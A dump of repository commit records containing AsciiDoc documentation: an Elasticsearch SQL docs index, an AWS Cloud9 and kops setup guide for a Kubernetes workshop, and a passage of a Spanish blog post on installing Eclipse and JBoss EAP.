{xes-repo-dir}\/..\/..\/plugin\/sql\/qa\/\n:sql-specs: {sql-tests}server\/src\/main\/resources\/\n:jdbc-tests: {sql-tests}jdbc\/src\/main\/java\/org\/elasticsearch\/xpack\/sql\/qa\/jdbc\n:security-tests: {sql-tests}server\/security\/src\/test\/java\/org\/elasticsearch\/xpack\/sql\/qa\/security\n:es-sql: Elasticsearch SQL\n\n[partintro]\n--\n\nX-Pack includes a SQL feature to execute SQL queries against {es}\nindices and return results in tabular format.\n\nThe following chapters aim to cover everything from usage, to syntax and drivers.\nExperience users or those in a hurry might want to jump directly to \nthe list of SQL <<sql-commands, commands>> and <<sql-functions, functions>>.\n\n<<sql-overview, Overview>>::\n Overview of {es-sql} and its features.\n<<sql-getting-started, Getting Started>>::\n Start using SQL right away in {es}.\n<<sql-concepts, Concepts and Terminology>>::\n Language conventions across SQL and {es}.\n<<sql-security,Security>>::\n Secure {es-sql} and {es}.\n<<sql-rest,REST API>>::\n Execute SQL in JSON format over REST.\n<<sql-translate,Translate API>>::\n Translate SQL in JSON format to {es} native query.\n<<sql-cli,CLI>>::\n Command-line application for executing SQL against {es}.\n<<sql-jdbc,JDBC>>::\n JDBC driver for {es}.\n<<sql-odbc,ODBC>>::\n ODBC driver for {es}.\n<<sql-client-apps,Client Applications>>::\n Setup various SQL\/BI tools with {es-sql}.\n<<sql-spec,SQL Language>>::\n Overview of the {es-sql} language, such as supported data types, commands and\n syntax.\n<<sql-functions,Functions and Operators>>::\n List of functions and operators supported.\n<<sql-limitations,Limitations>>::\n {es-sql} current limitations.\n--\n\ninclude::overview.asciidoc[]\ninclude::getting-started.asciidoc[]\ninclude::concepts.asciidoc[]\ninclude::security.asciidoc[]\ninclude::endpoints\/index.asciidoc[]\ninclude::language\/index.asciidoc[]\ninclude::functions\/index.asciidoc[]\ninclude::appendix\/index.asciidoc[]\ninclude::limitations.asciidoc[]\n\n:jdbc-tests!:\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"727efd600cb48c9605b416d55c8491519e065ac4","subject":"Formatting and fixes from chime (4)","message":"Formatting and fixes from chime (4)\n","repos":"arun-gupta\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop","old_file":"01-path-basics\/101-start-here\/readme.adoc","new_file":"01-path-basics\/101-start-here\/readme.adoc","new_contents":"= Kubernetes - Setup Cloud9 Development Environment\n:icons:\n:linkcss:\n:imagesdir: ..\/..\/resources\/images\n:toc:\n\nThis tutorial will walk you through the process of creating a Kubernetes development environment using https:\/\/aws.amazon.com\/cloud9\/[AWS Cloud9]. This will provide you with a cloud-based integrated development environment (IDE) that will let you write, run and debug containerized workloads with just a web browser.\n\n== Create AWS Cloud9 Environment\n=== AWS Cloud9 Console\n\n[NOTE]\nIf you are experienced with Cloud9, kubectl, kops, and git (_or if you just want a working development environment quickly_), please skip to xref:cfn[automated deployment using CloudFormation.]\n\nFirst, Log into the AWS Cloud9 Console. AWS Cloud9 is only available in 5 regions currently. Please choose the region closest to you geographically.\n\n[cols=\"2*^\"]\n|===\n| *N. Virginia* (us-east-1)\n|link:https:\/\/us-east-1.console.aws.amazon.com\/cloud9\/home\/create[Cloud9 Console]\n| *Ohio* (us-east-2)\n|link:https:\/\/us-east-2.console.aws.amazon.com\/cloud9\/home\/create[Cloud9 Console]\n| *Oregon* (us-west-2)\n|link:https:\/\/us-west-2.console.aws.amazon.com\/cloud9\/home\/create[Cloud9 Console]\n| *Ireland* (eu-west-1)\n|link:https:\/\/eu-west-1.console.aws.amazon.com\/cloud9\/home\/create[Cloud9 Console]\n| *Singapore* (ap-southeast-1)\n|link:https:\/\/ap-southeast-1.console.aws.amazon.com\/cloud9\/home\/create[Cloud9 Console]\n|===\n\nOnce there, follow these steps:\n\n1. Provide a name for your environment. Feel free to use something simple, such as `kubernetes-development`. Then click \"Next Step\".\n\n2. Change the \"Instance Type\" to `t2.small (2 GiB RAM + 1 vCPU)`.\n\n3. Expand the \"Network settings (advanced)\" section and make sure you are using the default VPC. It will have \"(default)\" next to the name. If you do not have a default VPC listed, it is recommended that you create a \"Single Public Subnet\" VPC by clicking the \"Create new VPC\" button and following the wizard it presents.\n\n4. If everything is correct, click the \"Next Step\" button.\n\n5. Review the configuration to ensure everything is correct and then click the \"Create environment\" button.\n\nThis will close the wizard and you will be taken to a screen informing you that your new AWS Cloud9 environment is being created. Once this is completed, the IDE will open to the following screen:\n\nimage:cloud9-development-environment-welcome.png[]\n\nYour environment is now ready to be setup for working with Kubernetes and the rest of this workshop.\n\n=== Set up Environment\n\nYour AWS Cloud9 environment comes with many useful tools preinstalled, but there are still a few tweaks to these and additional tools you will need to support working with Kubernetes.\n\n=== Configure the AWS CLI\n\nYour AWS Cloud9 environment comes with the AWS CLI preinstalled and configured to automatically use the credentials of the currently logged in user. Make sure you are logged in as a user with link:aws-permissions.adoc[these permissions.]\n\n[NOTE]\n*********************\nIt is not recommended that you change the default AWS CLI config in your AWS Cloud9 environment. Instead, it is recommended that you provide the logged in user's account the permissions needed to make any requests needed by your project. More information on this can be found by visiting: https:\/\/docs.aws.amazon.com\/cloud9\/latest\/user-guide\/credentials.html[Calling AWS Services from an Environment in AWS Cloud9]\n*********************\n\n[NOTE]\nAll the commands below should be run in the Terminal section of your Cloud9 GUI.\n\n=== Verify Docker Version\n\nDocker is preinstalled. You can verify the version by running the following:\n\n $ docker --version\n Docker version 17.06.2-ce, build 3dfb8343b139d6342acfd9975d7f1068b5b1c3d3\n\nYou should have a similar or newer version. \n\n=== Install Kubectl CLI\n\nInstall the Kubectl CLI:\n\n $ curl -Lo kubectl https:\/\/storage.googleapis.com\/kubernetes-release\/release\/v1.9.2\/bin\/linux\/amd64\/kubectl && chmod +x kubectl && sudo mv kubectl \/usr\/local\/bin\/\n\nAdd kubectl autocompletion to your current shell:\n\n $ source <(kubectl completion bash)\n\nYou can verify that kubectl is installed by executing the following command:\n\n $ kubectl version --client\n Client Version: version.Info{Major:\"1\", Minor:\"9\", GitVersion:\"v1.9.2\", GitCommit:\"6e937839ac04a38cac63e6a7a306c5d035fe7b0a\", GitTreeState:\"clean\", BuildDate:\"2017-09-28T22:57:57Z\", GoVersion:\"go1.8.3\", Compiler:\"gc\", Platform:\"linux\/amd64\"}\n\n=== Install kops\n\nInstall kops using the following:\n\n $ curl -LO https:\/\/github.com\/kubernetes\/kops\/releases\/download\/$(curl -s https:\/\/api.github.com\/repos\/kubernetes\/kops\/releases\/latest | grep tag_name | cut -d '\"' -f 4)\/kops-linux-amd64\n $ chmod +x kops-linux-amd64\n $ sudo mv kops-linux-amd64 \/usr\/local\/bin\/kops\n\n=== Configure an S3 bucket for kops\n\nkops needs a \"`state store`\" to store configuration information of the cluster. We will use a s3 bucket with versioning enabled. A state store can work with multiple kops clusters.\n\n[NOTE] \nThe bucket name must be unique otherwise you will encounter an error on deployment. We will use an example bucket name of `kops-state-store-` and add a randomly generated string to the end.\n\n $ export S3_BUCKET=kops-state-store-$(cat \/dev\/urandom | LC_ALL=C tr -dc \"[:alpha:]\" | tr '[:upper:]' '[:lower:]' | head -c 32)\n $ export KOPS_STATE_STORE=s3:\/\/${S3_BUCKET}\n $ aws s3 mb $KOPS_STATE_STORE\n $ aws s3api put-bucket-versioning --bucket $S3_BUCKET --versioning-configuration Status=Enabled\n\n=== Clone the repository\n\nThe workshop repository has configuration files that are used to create Kubernetes resources. You need to clone the repo to have access to those files:\n\n $ git clone https:\/\/github.com\/aws-samples\/aws-workshop-for-kubernetes\n\nAt this point, you should have everything you need to complete any of the sections of the this workshop using your Cloud9 Environment.\n\nanchor:cfn[]\n\n== Automated Deployment using CloudFormation\n\nIt is possible to create and configure the Cloud9 development environment via CloudFormation.\n\nIf you've just completed the section above and have the git repository cloned in your Cloud9 environment, you do *not* need to deploy this CloudFormation template. You are ready to xref:next[move on!]\n\nThis CloudFormation template will create the Cloud9 IDE, IAM Role required for kops and S3 bucket for kops state store.\n\n|===\n\n|Region | Launch template with a new VPC | Launch template with an existing VPC\n| *N. Virginia* (us-east-1)\na| image::.\/deploy-to-aws.png[link=https:\/\/console.aws.amazon.com\/cloudformation\/home?region=us-east-1#\/stacks\/new?stackName=k8s-workshop&templateURL=https:\/\/s3.amazonaws.com\/aws-kubernetes-artifacts\/lab-ide-vpc.template]\na| image::.\/deploy-to-aws.png[link=https:\/\/console.aws.amazon.com\/cloudformation\/home?region=us-east-1#\/stacks\/new?stackName=k8s-workshop&templateURL=https:\/\/s3.amazonaws.com\/aws-kubernetes-artifacts\/lab-ide-novpc.template]\n\n| *Ohio* (us-east-2)\na| image::.\/deploy-to-aws.png[link=https:\/\/console.aws.amazon.com\/cloudformation\/home?region=us-east-2#\/stacks\/new?stackName=k8s-workshop&templateURL=https:\/\/s3.amazonaws.com\/aws-kubernetes-artifacts\/lab-ide-vpc.template]\na| image::.\/deploy-to-aws.png[link=https:\/\/console.aws.amazon.com\/cloudformation\/home?region=us-east-2#\/stacks\/new?stackName=k8s-workshop&templateURL=https:\/\/s3.amazonaws.com\/aws-kubernetes-artifacts\/lab-ide-novpc.template]\n\n| *Oregon* (us-west-2)\na| image::.\/deploy-to-aws.png[link=https:\/\/console.aws.amazon.com\/cloudformation\/home?region=us-west-2#\/stacks\/new?stackName=k8s-workshop&templateURL=https:\/\/s3.amazonaws.com\/aws-kubernetes-artifacts\/lab-ide-vpc.template]\na| image::.\/deploy-to-aws.png[link=https:\/\/console.aws.amazon.com\/cloudformation\/home?region=us-west-2#\/stacks\/new?stackName=k8s-workshop&templateURL=https:\/\/s3.amazonaws.com\/aws-kubernetes-artifacts\/lab-ide-novpc.template]\n\n| *Ireland* (eu-west-1)\na| image::.\/deploy-to-aws.png[link=https:\/\/console.aws.amazon.com\/cloudformation\/home?region=eu-west-1#\/stacks\/new?stackName=k8s-workshop&templateURL=https:\/\/s3.amazonaws.com\/aws-kubernetes-artifacts\/lab-ide-vpc.template]\na| image::.\/deploy-to-aws.png[link=https:\/\/console.aws.amazon.com\/cloudformation\/home?region=us-west-2#\/stacks\/new?stackName=k8s-workshop&templateURL=https:\/\/s3.amazonaws.com\/aws-kubernetes-artifacts\/lab-ide-novpc.template]\n\n| *Singapore* (ap-southeast-1)\na| image::.\/deploy-to-aws.png[link=https:\/\/console.aws.amazon.com\/cloudformation\/home?region=ap-southeast-1#\/stacks\/new?stackName=k8s-workshop&templateURL=https:\/\/s3.amazonaws.com\/aws-kubernetes-artifacts\/lab-ide-vpc.template]\na| image::.\/deploy-to-aws.png[link=https:\/\/console.aws.amazon.com\/cloudformation\/home?region=us-west-2#\/stacks\/new?stackName=k8s-workshop&templateURL=https:\/\/s3.amazonaws.com\/aws-kubernetes-artifacts\/lab-ide-novpc.template]\n\n|===\n\nTo open Cloud9 IDE environment, click on Output tab in CloudFormation Console and open Cloud9 URL\n\nhttps:\/\/console.aws.amazon.com\/cloud9\/ide\/<EnvironmentId>\n\nanchor:next[]\n\n== Build Script\n\nOnce your Cloud9 is ready, download the build script and install in your IDE. This will prepare your IDE for running tutorials in this workshop. The build script will install the following:\n\n- jq\n- kubectl\n- kops\n- configures AWS CLI and stores variables in bash_profile (for ex: AWS_AVAILABILITY_ZONES, KOPS_STATE_STORE etc)\n- creates an SSH key\n- clone the workshop repository into Cloud9\n\nTo install the script, run this command - again in the Terminal tab of the Cloud9 IDE:\n\n $ aws s3 cp s3:\/\/aws-kubernetes-artifacts\/lab-ide-build.sh . && chmod +x lab-ide-build.sh && .\/lab-ide-build.sh\n\nOne last step is required so that Cloud9 IDE uses assigned IAM Instance profile. Open the \"AWS Cloud9\" menu, go to \"Preferences\", go to \"AWS Settings\", and disable \"AWS managed temporary credentials\" as depicted in the diagram here:\n\nimage:cloud9-disable-temp-credentials.png[]\n\nimage:next-step-arrow.png[ , title=\"Continue!\"] \nYou are now ready to continue on with the workshop!\n\nThe next step is link:..\/102-your-first-cluster[to create a Kubernetes cluster using kops].\n\n== Workshop Cleanup \n\nOnce you have finished with the workshop, please don't forget to spin down your cluster or you will incur additional charges.\n(We will also remind you at the end!)\n\n==== Delete Kubernetes cluster resources\n\nIn your Cloud9 IDE, check if there are any running kubernetes cluster\n\n kops get cluster\n\nDelete kubernetes cluster\n\n kops delete cluster example.cluster.k8s.local --yes\n\nWait until all resources are deleted by kops\n\n==== Delete Cloud9 Envionment\n\nGo to CloudFormation console, right click template with name 'k8s-workshop' and select 'Delete Stack'\n\nThis should delete all the resources associated with this workshop\n\n====\n","old_contents":"= Kubernetes - Setup Cloud9 Development Environment\n:icons:\n:linkcss:\n:imagesdir: ..\/..\/resources\/images\n:toc:\n\nThis tutorial will walk you through the process of creating a Kubernetes development environment using https:\/\/aws.amazon.com\/cloud9\/[AWS Cloud9]. This will provide you with a cloud-based integrated development environment (IDE) that will let you write, run and debug containerized workloads with just a web browser.\n\n== Create AWS Cloud9 Environment\n=== AWS Cloud9 Console\n\n[NOTE]\nIf you are experienced with Cloud9, kubectl, kops, and git (or if you just want a working development environment quickly), please skip to xref:cfn[automated deployment using CloudFormation.]\n\nFirst, Log into the AWS Cloud9 Console. AWS Cloud9 is only available in 5 regions currently. Please choose the region closest to you geographically.\n\n[cols=\"2*^\"]\n|===\n| *N. Virginia* (us-east-1)\n|link:https:\/\/us-east-1.console.aws.amazon.com\/cloud9\/home\/create[Cloud9 Console]\n| *Ohio* (us-east-2)\n|link:https:\/\/us-east-2.console.aws.amazon.com\/cloud9\/home\/create[Cloud9 Console]\n| *Oregon* (us-west-2)\n|link:https:\/\/us-west-2.console.aws.amazon.com\/cloud9\/home\/create[Cloud9 Console]\n| *Ireland* (eu-west-1)\n|link:https:\/\/eu-west-1.console.aws.amazon.com\/cloud9\/home\/create[Cloud9 Console]\n| *Singapore* (ap-southeast-1)\n|link:https:\/\/ap-southeast-1.console.aws.amazon.com\/cloud9\/home\/create[Cloud9 Console]\n|===\n\nOnce there, follow these steps:\n\n1. Provide a name for your environment. Feel free to use something simple, such as `kubernetes-development`. Then click \"Next Step\".\n\n2. Change the \"Instance Type\" to `t2.small (2 GiB RAM + 1 vCPU)`.\n\n3. Expand the \"Network settings (advanced)\" section and make sure you are using the default VPC. It will have \"(default)\" next to the name. If you do not have a default VPC listed, it is recommended that you create a \"Single Public Subnet\" VPC by clicking the \"Create new VPC\" button and following the wizard it presents.\n\n4. If everything is correct, click the \"Next Step\" button.\n\n5. Review the configuration to ensure everything is correct and then click the \"Create environment\" button.\n\nThis will close the wizard and you will be taken to a screen informing you that your new AWS Cloud9 environment is being created. Once this is completed, the IDE will open to the following screen:\n\nimage:cloud9-development-environment-welcome.png[]\n\nYour environment is now ready to be setup for working with Kubernetes and the rest of this workshop.\n\n=== Set up Environment\n\nYour AWS Cloud9 environment comes with many useful tools preinstalled, but there are still a few tweaks to these and additional tools you will need to support working with Kubernetes.\n\n=== Configure the AWS CLI\n\nYour AWS Cloud9 environment comes with the AWS CLI preinstalled and configured to automatically use the credentials of the currently logged in user. Make sure you are logged in as a user with link:aws-permissions.adoc[these permissions.]\n\n[NOTE]\n*********************\nIt is not recommended that you change the default AWS CLI config in your AWS Cloud9 environment. Instead, it is recommended that you provide the logged in user's account the permissions needed to make any requests needed by your project. More information on this can be found by visiting: https:\/\/docs.aws.amazon.com\/cloud9\/latest\/user-guide\/credentials.html[Calling AWS Services from an Environment in AWS Cloud9]\n*********************\n\n[NOTE]\nAll the commands below should be run in the Terminal section of your Cloud9 GUI.\n\n=== Verify Docker Version\n\nDocker is preinstalled. You can verify the version by running the following:\n\n $ docker --version\n Docker version 17.06.2-ce, build 3dfb8343b139d6342acfd9975d7f1068b5b1c3d3\n\nYou should have a similar or newer version. \n\n=== Install Kubectl CLI\n\nInstall the Kubectl CLI:\n\n $ curl -Lo kubectl https:\/\/storage.googleapis.com\/kubernetes-release\/release\/v1.9.2\/bin\/linux\/amd64\/kubectl && chmod +x kubectl && sudo mv kubectl \/usr\/local\/bin\/\n\nAdd kubectl autocompletion to your current shell:\n\n $ source <(kubectl completion bash)\n\nYou can verify that kubectl is installed by executing the following command:\n\n $ kubectl version --client\n Client Version: version.Info{Major:\"1\", Minor:\"9\", GitVersion:\"v1.9.2\", GitCommit:\"6e937839ac04a38cac63e6a7a306c5d035fe7b0a\", GitTreeState:\"clean\", BuildDate:\"2017-09-28T22:57:57Z\", GoVersion:\"go1.8.3\", Compiler:\"gc\", Platform:\"linux\/amd64\"}\n\n=== Install kops\n\nInstall kops using the following:\n\n $ curl -LO https:\/\/github.com\/kubernetes\/kops\/releases\/download\/$(curl -s https:\/\/api.github.com\/repos\/kubernetes\/kops\/releases\/latest | grep tag_name | cut -d '\"' -f 4)\/kops-linux-amd64\n $ chmod +x kops-linux-amd64\n $ sudo mv kops-linux-amd64 \/usr\/local\/bin\/kops\n\n=== Clone the repository\n\nThe workshop repository has configuration files that are used to create Kubernetes resources. You need to clone the repo to have access to those files:\n\n $ git clone https:\/\/github.com\/aws-samples\/aws-workshop-for-kubernetes\n\nAt this point, you should have everything you need to complete any of the sections of the this workshop using your Cloud9 Environment.\n\nanchor:cfn[]\n\n== Automated Deployment using CloudFormation\n\nIt is possible to create and configure the Cloud9 development environment via CloudFormation.\n\nIf you've just completed the section above and have the git repository cloned in your Cloud9 environment, you do *not* need to deploy this CloudFormation template. You are ready to xref:next[move on!]\n\nThis CloudFormation template will create the Cloud9 IDE, IAM Role required for kops and S3 bucket for kops state store.\n\n|===\n\n|Region | Launch template with a new VPC | Launch template with an existing VPC\n| *N. Virginia* (us-east-1)\na| image::.\/deploy-to-aws.png[link=https:\/\/console.aws.amazon.com\/cloudformation\/home?region=us-east-1#\/stacks\/new?stackName=k8s-workshop&templateURL=https:\/\/s3.amazonaws.com\/aws-kubernetes-artifacts\/lab-ide-vpc.template]\na| image::.\/deploy-to-aws.png[link=https:\/\/console.aws.amazon.com\/cloudformation\/home?region=us-east-1#\/stacks\/new?stackName=k8s-workshop&templateURL=https:\/\/s3.amazonaws.com\/aws-kubernetes-artifacts\/lab-ide-novpc.template]\n\n| *Ohio* (us-east-2)\na| image::.\/deploy-to-aws.png[link=https:\/\/console.aws.amazon.com\/cloudformation\/home?region=us-east-2#\/stacks\/new?stackName=k8s-workshop&templateURL=https:\/\/s3.amazonaws.com\/aws-kubernetes-artifacts\/lab-ide-vpc.template]\na| image::.\/deploy-to-aws.png[link=https:\/\/console.aws.amazon.com\/cloudformation\/home?region=us-east-2#\/stacks\/new?stackName=k8s-workshop&templateURL=https:\/\/s3.amazonaws.com\/aws-kubernetes-artifacts\/lab-ide-novpc.template]\n\n| *Oregon* (us-west-2)\na| image::.\/deploy-to-aws.png[link=https:\/\/console.aws.amazon.com\/cloudformation\/home?region=us-west-2#\/stacks\/new?stackName=k8s-workshop&templateURL=https:\/\/s3.amazonaws.com\/aws-kubernetes-artifacts\/lab-ide-vpc.template]\na| image::.\/deploy-to-aws.png[link=https:\/\/console.aws.amazon.com\/cloudformation\/home?region=us-west-2#\/stacks\/new?stackName=k8s-workshop&templateURL=https:\/\/s3.amazonaws.com\/aws-kubernetes-artifacts\/lab-ide-novpc.template]\n\n| *Ireland* (eu-west-1)\na| image::.\/deploy-to-aws.png[link=https:\/\/console.aws.amazon.com\/cloudformation\/home?region=eu-west-1#\/stacks\/new?stackName=k8s-workshop&templateURL=https:\/\/s3.amazonaws.com\/aws-kubernetes-artifacts\/lab-ide-vpc.template]\na| image::.\/deploy-to-aws.png[link=https:\/\/console.aws.amazon.com\/cloudformation\/home?region=us-west-2#\/stacks\/new?stackName=k8s-workshop&templateURL=https:\/\/s3.amazonaws.com\/aws-kubernetes-artifacts\/lab-ide-novpc.template]\n\n| *Singapore* (ap-southeast-1)\na| image::.\/deploy-to-aws.png[link=https:\/\/console.aws.amazon.com\/cloudformation\/home?region=ap-southeast-1#\/stacks\/new?stackName=k8s-workshop&templateURL=https:\/\/s3.amazonaws.com\/aws-kubernetes-artifacts\/lab-ide-vpc.template]\na| image::.\/deploy-to-aws.png[link=https:\/\/console.aws.amazon.com\/cloudformation\/home?region=us-west-2#\/stacks\/new?stackName=k8s-workshop&templateURL=https:\/\/s3.amazonaws.com\/aws-kubernetes-artifacts\/lab-ide-novpc.template]\n\n|===\n\nTo open Cloud9 IDE environment, click on Output tab in CloudFormation Console and open Cloud9 URL\n\nhttps:\/\/console.aws.amazon.com\/cloud9\/ide\/<EnvironmentId>\n\nanchor:next[]\n\n== Build Script\n\nOnce your Cloud9 is ready, download the build script and install in your IDE. This will prepare your IDE for running tutorials in this workshop. The build script will install the following:\n\n- jq\n- kubectl\n- kops\n- configures AWS CLI and stores variables in bash_profile (for ex: AWS_AVAILABILITY_ZONES, KOPS_STATE_STORE etc)\n- creates an SSH key\n- clone the workshop repository into Cloud9\n\nTo install the script, run this command - again in the Terminal tab of the Cloud9 IDE:\n\n $ aws s3 cp s3:\/\/aws-kubernetes-artifacts\/lab-ide-build.sh . && chmod +x lab-ide-build.sh && .\/lab-ide-build.sh\n\nOne last step is required so that Cloud9 IDE uses assigned IAM Instance profile. Open the \"AWS Cloud9\" menu, go to \"Preferences\", go to \"AWS Settings\", and disable \"AWS managed temporary credentials\" as depicted in the diagram here:\n\nimage:cloud9-disable-temp-credentials.png[]\n\nimage:next-step-arrow.png[ , title=\"Continue!\"] \nYou are now ready to continue on with the workshop!\n\nThe next step is link:..\/102-your-first-cluster[to create a Kubernetes cluster using kops].\n\n== Workshop Cleanup \n\nOnce you have finished with the workshop, please don't forget to spin down your cluster or you will incur additional charges.\n(We will also remind you at the end!)\n\n==== Delete Kubernetes cluster resources\n\nIn your Cloud9 IDE, check if there are any running kubernetes cluster\n\n kops get cluster\n\nDelete kubernetes cluster\n\n kops delete cluster example.cluster.k8s.local --yes\n\nWait until all resources are deleted by kops\n\n==== Delete Cloud9 Envionment\n\nGo to CloudFormation console, right click template with name 'k8s-workshop' and select 'Delete Stack'\n\nThis should delete all the resources associated with this workshop\n\n====\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e009cd63b28bf0cb6cd1e15be277d449f9a27cb6","subject":"Update 2015-04-15-Montar-un-entorno-de-trabajo-adecuado-22.adoc","message":"Update 2015-04-15-Montar-un-entorno-de-trabajo-adecuado-22.adoc","repos":"lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io,lametaweb\/lametaweb.github.io","old_file":"_posts\/2015-04-15-Montar-un-entorno-de-trabajo-adecuado-22.adoc","new_file":"_posts\/2015-04-15-Montar-un-entorno-de-trabajo-adecuado-22.adoc","new_contents":"= Montar un entorno de trabajo adecuado (2\/2)\nLa metaweb\n:hp-tags: Eclipse, JBoss, JBoss Tools\n:published_at: 2015-04-15\n\nEn esta segunda entrada terminaremos de instalar y configurar el software que nos permitir\u00e1 en adelante construir nuestras propias aplicaciones Java EE. Como IDE optamos por Eclipse, por ser el m\u00e1s extendido. El salto de uno a otro IDE no es algo costoso, ni en tiempo de aprendizaje ni en tiempo de adaptaci\u00f3n del proyecto si los gestionamos bajo Maven o Gradle.\n\nUn IDE debe procurar al desarrollador un entorno que le permita ser lo m\u00e1s productivo posible, ocultando la complejidad de las tecnolog\u00edas empleadas tras el c\u00f3digo fuente generado para resolver las tareas de los documentos de dise\u00f1o del proyecto. Un ejemplo lo tenemos cuando creamos un web service, aqu\u00ed el IDE nos generar\u00e1 todas las clases y ficheros necesarios y nosotros s\u00f3lo tendremos que enfocarnos en definir la API e implementar cada operaci\u00f3n.\n\nEn mi experiencia Netbeans es un buen entorno, con muchas ayudas, y maduro en su versi\u00f3n en su versi\u00f3n 8, adem\u00e1s tiene detr\u00e1s a una gran comunidad y a Oracle. Como dato en contra, durante el desarrollo de un proyecto mediano, en la versi\u00f3n 8.0, de cuando en cuando se quedaba \"pensando\" unos segundos. Por otro lado tenemos a JDeveloper, que es el IDE oficial de Oracle, muy potente y una opci\u00f3n recomendable para nuevos proyectos de gran tama\u00f1o, y si desarrollamos contra Oracle, y\/o el servidor Weblogic. Para proyectos Spring est\u00e1 Eclipse STS que ofrece potentes wizards. Si nuestro servidor es JBoss o el nuevo WildFly podemos optar la soluci\u00f3n adoptada aqu\u00ed, Eclipse + JBoss Tools, o directamente por JBoss Developer Studio. La ventaja de optar por Eclipse es que podemos personalizar nuestro entorno instalando los plugins que elijamos. En definitiva tenemos m\u00faltiples opciones y la decisi\u00f3n muchas veces depender\u00e1 de las tecnolog\u00edas que elijamos o nos imponga el tipo de proyecto o el propio cliente.\n\nOk, antes de nada vamos a crear una sencilla estructura de carpetas donde ir guardardo el trabajo, y donde instalar el software. Por ejemplo la siguiente:\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig009.png[]\n\nBajo la carpeta `TALLER` creamos las siguientes:\n\n* `BD`: Para las bases de datos que vayamos instalando: MySQL, Derby, etc.\n* `IDE`: Para la instalaci\u00f3n del IDE Eclipse. Instalad otros si quer\u00e9is echarles un vistazo.\n* `Servidor`: Aqu\u00ed ir\u00e1 nuestro JBoss EAP edici\u00f3n Comunity. Aunque si en el futuro vemos algo particular de Java EE 7 instalaremos WildFly o GlassFish. \n* `Workspace`: Para guardar los proyectos desarrollados en Eclipse.\n\nEl fichero comprimido es simplemente una forma r\u00e1pida de hacer una copia de seguridad del workspace.\n\nPara instalar Eclipse, os aconsejo de nuevo que lo hag\u00e1is en Ingl\u00e9s, vamos a la p\u00e1gina https:\/\/www.eclipse.org\/downloads\/ y elegimos la instalaci\u00f3n para desarrolladores de Java EE.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig010.png[]\n\nBajamos el fichero `.zip`, lo copiamos en la carpeta `c:\\TALLER\\IDE\\` y seleccionamos Extraer aqu\u00ed, no hay programa de instalaci\u00f3n. Entramos en la carpeta de Eclipse y doble click en `eclipse.exe`. Seleccionamos la carpeta `c:\\TALLER\\workspace\\` como espacio de trabajo. El IDE se carga y cerramos la pantalla inicial de bienvenida pulsando en el icono en la esquina arriba a la derecha.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig015.png[]\n\nNOTE: No marqu\u00e9is el check `Use this as the default and do not ask again` para as\u00ed cambiar el workspace si quer\u00e9is en un futuro. Si lo marc\u00e1is pod\u00e9is volver a ver la pantalla de selecci\u00f3n de la carpeta del workspace configur\u00e1ndolo en `Window > Preferences > General > Startup and Shutdown > Workspaces`.\n\nAhora le toca al servidor. Nuestro entorno de trabajo necesita un servidor completo para depurar el c\u00f3digo que estemos desarrollando. Navegamos a la p\u00e1gina oficial del servidor JBoss en http:\/\/www.redhat.com\/en\/technologies\/jboss-middleware\/application-platform y pulsamos el bot\u00f3n `TRY IT NOW` dentro de la pesta\u00f1a `TRY`, seleccionada por defecto.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig020.png[]\n\nEsto nos lleva a la p\u00e1gina del servidor JBoss para desarrolladores.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig022.png[]\n\nElegimos nuestro sistema operativo y pulsamos sobre el enlace del installer. Si no estamos ya logados saltaremos a la p\u00e1gina de introducci\u00f3n de usuario y contrse\u00f1a. Procedemos a la creaci\u00f3n de una cuenta pulsando el enlace `Create Account`.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig025.png[]\n\nDespu\u00e9s de introducir una serie de datos b\u00e1sicos aceptamos los t\u00e9rminos del Programa de Desarrollador de Jboss. Esperamos a que la bajada del fichero acabe. Copiamos el fichero en la carpeta `C:\\TALLER\\Servidor\\` y lo arrancamos escribiendo el comando `java -jar jboss-eap-6.3.0-installer.jar`.\n\nSe iniciar\u00e1 un sencillo wizard de instalaci\u00f3n. Si os aparece un mensaje acerca del Firewall de Windows elegid la opci\u00f3n `Permitir`. A la hora de elegir la carpeta de instalaci\u00f3n seleccionad como antes, `C:\\TALLER\\Servidor\\`. Escribimos luego un nombre de usuario y una contrase\u00f1a. Estas credenciales son las del usuario administrador del servidor, que lo gestionar\u00e1 a trav\u00e9s del navegador usando la Consola de Administraci\u00f3n. Apuntad en un sitio seguro estos datos para no olvidarlos. En la instalaci\u00f3n de este servidor se eligieron las credenciales:\n\n[cols=\"1h,2\", width=\"40\"]\n|===\n|user\n|admin\n\n|password\n|abcd-1234\n|===\n\nEs interesante instalar tambi\u00e9n los ejemplos que trae el servidor. Son varios proyectos Maven que muestran ejemplos sencillos sobre el uso de las diferentes tecnolog\u00edas Java EE incidiendo en las gestionadas desde Red Hat: JPA (Hibernate), CDI (Weld), EJB, JSF, etc. Si abrimos el `pom.xml` de alguno de estos proyectos veremos como se definen de las dependencias en proyectos que se despliegan en el servidor JBoss.\n\nEl wizard contin\u00faa por una serie de pantallas donde dejamos las opciones por defecto, la instalaci\u00f3n finaliza a los pocos segundos. Y ya tenemos instalado un flamante servidor Java EE 6 en local. Podemos finalmente guardar y echar un vistazo al script de instalaci\u00f3n.\n\nimage::https:\/\/raw.githubusercontent.com\/lametaweb\/lametaweb.github.io\/master\/images\/001\/prac001-fig030.png[]\n\nComprobaremos que la instalaci\u00f3n es correcta desplegando la aplicaci\u00f3n web _Hello World!_ localizada en los ejemplos reci\u00e9n instalados. Para arrancar manualmente el servidor abrimos una consola de comandos, vamos a la 